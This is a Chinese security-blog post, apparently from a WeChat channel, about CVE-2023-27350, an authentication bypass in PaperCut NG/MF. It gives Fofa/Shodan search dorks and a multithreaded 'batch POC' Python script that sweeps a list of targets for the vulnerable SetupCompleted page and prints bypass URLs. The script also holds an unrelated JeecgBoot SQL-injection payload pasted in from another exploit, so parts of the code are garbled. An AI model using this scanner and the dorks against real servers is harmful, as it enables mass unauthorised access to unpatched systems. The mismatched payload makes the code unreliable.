!! 🍁副条也精彩,🎄不要错过.
!! 由于微信公众号推送机制改变了,快来星标不迷路!
1免责声明
本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
2CVE-2023-27350漏洞介绍
此漏洞允许远程攻击者绕过受影响的 PaperCut NG 22.0.5(内部版本 63914)安装上的身份验证。利用此漏洞不需要身份验证。特定缺陷存在于 SetupCompleted 类中。此问题是由于访问控制不当导致的。攻击者可以利用此漏洞绕过身份验证并在 SYSTEM 上下文中执行任意代码。发布日期:04/20/2023
Base Score: 9.8 CRITICAL
漏洞库链接
https://nvd.nist.gov/vuln/detail/CVE-2023-27350
3PaperCut NG介绍
中文官方:
https://www.papercut.com/zh-cn/ng/
适合所有人的DIY打印管理解决方案
客户端下载
试用版
https://www.papercut.com/products/ng/download/
4影响范围
PaperCut NG和PaperCut MF 版本 8.0 或更高版本,适用于所有操作系统平台 修补版本:版本 20.1.7、21.2.11 和 22.0.9 及更高版本。
5资产搜索
资产语法:
#Fofa
title="papercut"# Shodan
http.html:"papercut"
6批量POC
from queue import Queue
import re
from threading import Thread, Lock
from bs4 import BeautifulSoup
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)
BASE_URL = "/jeecg-boot/jmreport/qurestSql"
data={
'apiSelectId':'1290104038414721025',
'id': "1' or '%1%' like (updatexml(0x3a,concat(1,md5('123456'),1)) or '%%' like '"
}
headers={
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.',
'Content-Type': 'application/json;charset=UTF-8',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'
}
def write_Result(url):
with open("resuslt.txt", "a", encoding="utf-8") as f:
f.write(url + "\n")
def ReadFile(fQueue: Queue):
# self.file = 要读取的文本
# 当前测试为静态路径
with open(r"text.txt", 'r', encoding='utf-8') as file:
for file in file.readlines():
f = file.replace("\n", '').strip('/')
fQueue.put(f)
class A(Thread):
def __init__(self, a):
super(A, self).__init__()
self.queue = a
self.setDaemon(True)
def run(self) -> None:
try:
response = requests.get(url=self.queue + '/app?service=page/SetupCompleted', headers=headers ,json=data,verify=False)
# print("URL:{} STATUS:{}".format(response.url, response.status_code))
if response.status_code == 200:
write_Result(self.queue + '/app?service=page/SetupCompleted')
soup = BeautifulSoup(response.text, 'html.parser')
text_div = soup.find('div', class_='text')
version_span = None
for span in text_div.find_all('span'):
version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
if version_match:
version_span = span
break
if version_span is None:
print('Not Vulnerable')
else:
version_str = version_span.text.strip()
print('Version:', version_str)
print('HTTP Status Code:', response.status_code)
print(f"1) Visit this URL > {self.queue}/app?service=page/SetupCompleted")
write_Result(self.queue + '/app?service=page/SetupCompleted\n' + self.queue + '/app?service=page/Dashboard')
print(f"2) Login Authentication Bypass > {self.queue}/app?service=page/Dashboard")
except Exception as e:
pass
q = Queue()
ReadFile(q)
while True:
url = q.get()
A(url).start()
if q.empty():
break
7展示
8参考
https://mp.weixin.qq.com/s/UKaECN9PYR93ORis7l-XXw扫码回复“加群”加入交流群
工具获取回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以。
如有侵权请联系:admin#unsafe.sh